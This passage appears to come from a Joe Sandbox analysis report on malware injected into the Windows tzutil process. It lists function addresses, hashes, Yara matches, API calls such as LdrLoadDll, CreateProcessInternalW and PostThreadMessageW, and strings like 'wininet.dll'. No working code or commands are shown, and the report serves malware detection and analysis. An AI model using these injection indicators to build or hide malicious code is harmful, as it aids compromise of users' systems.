                                                              • Instruction ID: a8b17d102d6663ca5d2b028e4ea75b288ccf8fd673589e80d10a7ec1d6361afa
                                                              • Opcode Fuzzy Hash: 8aa5de9d17ef25f509145519e1dcdbd9973d4b7ef4b07cae1cab4d3e1ec1c7a5
                                                              • Instruction Fuzzy Hash: 50900231282441525D85F1584405507400697E1241795D013A1418951C85669956D625
                                                              Function 02E82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0130b0f3ecf243dd232f49498001b7f69ff82e0b539229454891e6b79950a7cd
                                                              • Instruction ID: 60ab7b198842f4d3e638a9a8a6758db28abb81d44690c0796fdc2da61d6af66b
                                                              • Opcode Fuzzy Hash: 0130b0f3ecf243dd232f49498001b7f69ff82e0b539229454891e6b79950a7cd
                                                              • Instruction Fuzzy Hash: 7D90023134140003D980B15854196074005D7E2301F55E012E0418555CD95589569226
                                                              Function 02E82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4f4876022f271fb80650957086a512b35977d215eb44f2e9377106517ed04302
                                                              • Instruction ID: 7d0ab85acaaca63ac03c140c800e082c16324146d6d03a3747df0a66230b549e
                                                              • Opcode Fuzzy Hash: 4f4876022f271fb80650957086a512b35977d215eb44f2e9377106517ed04302
                                                              • Instruction Fuzzy Hash: ED90023925340002D9C0B158540960B000587D2202F95E416A0019559CC95589699325
                                                              Function 02E835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c325afb17a0d1fda6417cb4a6148d5055012be3967fc18454be52ff7a5bbff01
                                                              • Instruction ID: 832f40db4b9bcd9d09a63d613430b2463b2eed6db1fd25cf59473ebfdc4836d7
                                                              • Opcode Fuzzy Hash: c325afb17a0d1fda6417cb4a6148d5055012be3967fc18454be52ff7a5bbff01
                                                              • Instruction Fuzzy Hash: 0390023164550402D940B1584515707100587D1201F65D412A0428569D87D58A51A5A6
                                                              Function 02E839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1d9b81c5dcdfa9bdcfd78861390f587a40cfa9519ffef4b34fe5980417642062
                                                              • Instruction ID: 56ab82fd8cf6bf3cd7d67352ff4a94ae13addca2837a78a66ecf24602c7a3bda
                                                              • Opcode Fuzzy Hash: 1d9b81c5dcdfa9bdcfd78861390f587a40cfa9519ffef4b34fe5980417642062
                                                              • Instruction Fuzzy Hash: 9590023128545102D990B15C44056174005A7E1201F55D022A0818595D85958955A225
                                                              Function 026A114D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 26a114d-26a1158 430 26a115a-26a1166 429->430 431 26a11d8-26a1247 call 26bb890 call 26bc2a0 call 26a4990 call 26913e0 call 26b2000 429->431 432 26a1168 430->432 433 26a11c3-26a11d4 430->433 445 26a1249-26a1258 PostThreadMessageW 431->445 446 26a1267-26a126d 431->446 432->433 445->446 447 26a125a-26a1264 445->447 447->446
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 026A1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction ID: 86513f89b5199632d2364484b2ec00c2ec1033a7fb3caaf7de1a37068c079198
                                                              • Opcode Fuzzy Hash: d1aa6d2f37b84fe075a66538aa12b124caae1e2cf1a1ebade3796bc28cf5f9fe
                                                              • Instruction Fuzzy Hash: DC212672A0424C7EEF01AE949C82DEFBB7CEF41394F0041ADF948A7240D6249E068FE5
                                                              Function 026A11D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 026A1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction ID: 1755bbc5142c04e9c76917422d4d980ce0eac0eaa03438d024d3dd11507b4b82
                                                              • Opcode Fuzzy Hash: cb65c5949d264f6dfddbe3e04f0d02becff97ea6d117dac3abb105f9e56e4b91
                                                              • Instruction Fuzzy Hash: B0118EB290024C7AEB11AAE44CD1DEFBB7DDF41A94F048158FA54B7240DA249E058FA5
                                                              Function 026A11E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 026A1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction ID: c24b85f690840e43ac52d6c5feab4302559ab2e77d186092b431d050a688125e
                                                              • Opcode Fuzzy Hash: 3ef7e33776fd51efe08ba38bed222d1d2d7fe35c9b17609095cb232add0010db
                                                              • Instruction Fuzzy Hash: EC016DB2D0024C7AEB11ABE49CD1DEF7B7DDF41694F048068FA58A7240D6345E068FA5
                                                              Function 026B3E10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 026B3EDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction ID: b0026235dbd8e52f0d623e4d05ef2c38d8b8eb2e391b11a1e62879f16a88a991
                                                              • Opcode Fuzzy Hash: c3fcf510093f2c6076039a929e9b56ab60fbd134cb2ede7f3546c4e514be9f82
                                                              • Instruction Fuzzy Hash: 93314CB1A01605BBDB15DFA4CC84FEBBBB9EF88714F00416DE61D5B240D774AA508FA4
                                                              Function 026AF8DD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction ID: 1bddb6be18e1a2735fd2a574dc4e54cf0798e62890a327c89e56e0bdf2e6e1f6
                                                              • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction Fuzzy Hash: 9E312176A00609AFDB10DFD8C8809EFB7B9FF88304F108559E915E7214D775AE458FA1
                                                              Function 026AF8E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction ID: c29d790fb62fc1db1d21d0bac702d9b8ca83d98bc2d24b6f613a6c166206a61e
                                                              • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction Fuzzy Hash: 24312176A00209AFDB10DFD8C8809EFB7B9FF88304B108559E915A7214D775EE458FA1
                                                              Function 026A4A0B Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction ID: c5448b0785062a34169db0c61eaa6052c41f1d3545f11351ff98d42712f5d6ef
                                                              • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction Fuzzy Hash: DF219E777002455FC315CA68DC91BF9B728EB42265F100298FA15CB381EF615E16CBA5
                                                              Function 026A4A25 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 026A4A02
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction ID: be17d272f49e3a73c2bd1a5616d256bec66ffe2e2ecd3345f5407270f56eaa31
                                                              • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction Fuzzy Hash: 0821ED3B6011868FCB01CE28CC51BE9FF64FF82519B2042D8D6258B346DBA29C17CF91
                                                              Function 026A4990 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 026A4A02
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 096cba0dcd461ca89dd7a3d07fd77cf8d71b0c8c7e88f08af3463d0df911c117
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: 7C011EB5D4020DBBDB10EAE4DC41FDDB3B9AF54308F004199E90897241FA71EB54CB95
                                                              Function 026B9B50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,026A8724,00000010,?,?,?,00000044,?,00000010,026A8724,?,?,?), ref: 026B9BB3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: 36ef180f735b917ab3ae5914db448bb62dfd025186f6d4fe803a748d35185e8f
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: B001AEB2215108BBCB04DE99DC90EEB77ADAF8D754F108208BA09A3240D630F8518BA4
                                                              Function 02699F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02699F62
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction ID: bafad0b70d6919f3bd72bf6fed7ddaccdc870d6af15f9d5ad11060b17a6f3f07
                                                              • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction Fuzzy Hash: 53F0653334030437E62165E99C02FDBB79D9F85765F14001AF60CDA5C0D991F5418BA8
                                                              Function 02699F1A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02699F62
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction ID: f7f2c4805598b37b0cfa3b6af19d0e25a0c2fd10d2d047f473b1f259fc8b8a8c
                                                              • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction Fuzzy Hash: 7BF02B333403043BE73166A88C02FEBB79C8F85B50F24011DF609AF5C0C991B541CBA8
                                                              Function 026B9AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,026A4211,000000F4), ref: 026B9B09
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction ID: 63376594522d6c65a1d57d65022c7d98e2bd4e4a3768481018baf75225b2b3fc
                                                              • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction Fuzzy Hash: 91E09A72200304BBDA20EF98DC41FAB73ADEFCAB10F004419F908A7241C630BC208BB8
                                                              Function 026B9A90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(026A1E59,?,026B5F17,026A1E59,?,026B5F17,?,026A1E59,026B59BF,00001000,?,00000000), ref: 026B9AC9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction ID: 6795c6beda3bd6ae3fb5786cc5a56f11dff99a798c357d4246426a3ea8a4c905
                                                              • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction Fuzzy Hash: EEE09A722102087BDA14EF99DC40F9B73ADEFCAB10F004409FA08A7240CA31BD108BB8
                                                              Function 026A8760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 026A878A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction ID: 45d71b2577ae3b0f5f8e07d67cae6cc85cbdfd0ac51872c373ef1e418e5f35c9
                                                              • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction Fuzzy Hash: 92E086752402082BFF146AA89C55F6A33984F88638F184A50BA1CDB3C1D674F9418A54
                                                              Function 026A8560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,026A2150,026B82FF,?,026A211B), ref: 026A8591
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2690000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction ID: 31d61853c25c93c2d7d0d76bba7b59c85267866077c60dc38491e11bc9bf4733
                                                              • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction Fuzzy Hash: 19D05EB23403053BFA40A6E4DC53F66328E4F04655F0500A8BE0CEB3C1DA61F6008E69
                                                              Function 02E82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: aa3dfd325f4f7620396dc7ef3f7d1b7f674dd86422e4f7e9a578d42c235331d0
                                                              • Instruction ID: d0a1289ef338c3b805175550c68231c5d2d963a52942e3805d3145fb2e4de5dc
                                                              • Opcode Fuzzy Hash: aa3dfd325f4f7620396dc7ef3f7d1b7f674dd86422e4f7e9a578d42c235331d0
                                                              • Instruction Fuzzy Hash: 48B09B719415C5C5DE51F7604A09717790067D1705F15D062D3474646E4778C1D1F175

                                                              Non-executed Functions

                                                              Function 02D504D0 Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284161154.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d50000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction ID: 675a45c21a74ca512632006586540c58ef26df6afbba9463865093f8649b0f16
                                                              • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction Fuzzy Hash: 9C41D37161CB1D4FDB68AF6890816B6B3E2FB49301F50052DD98AC3762EBB4EC468785
                                                              Function 02D5E0C9 Relevance: 56.5, Strings: 45, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284161154.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2d50000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction ID: aba2e7203c6dc6af96dd32e8ad82aaadca7bea4c344b6a8bcb54bd0ae6dcc479
                                                              • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction Fuzzy Hash: C7A141F04483948AC7158F58A0552AFFFB1EBC6305F15816DE6E6BB243C3BE8905CB95
                                                              Function 02E82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2e10000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 423e47ca670be69991fc0343d6bf4f15985beb76e3c72db761c95ca60265a126
                                                              • Instruction ID: 2a6b9c60259b7a4603f338e705e1ee5411fbace526a64bc915f38c5f3b2f7b7e
                                                              • Opcode Fuzzy Hash: 423e47ca670be69991fc0343d6bf4f15985beb76e3c72db761c95ca60265a126
                                                              • Instruction Fuzzy Hash: D251D6B1A40156AFDF11EB98C8809BFF7B8BB08204750E169E9ADD7641D334DE50CBA0
                                                              Function 02EF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: true
                                                              • Associated: 00000008.00000002.3284206752.0000000002F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.3284206752.0000000002F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
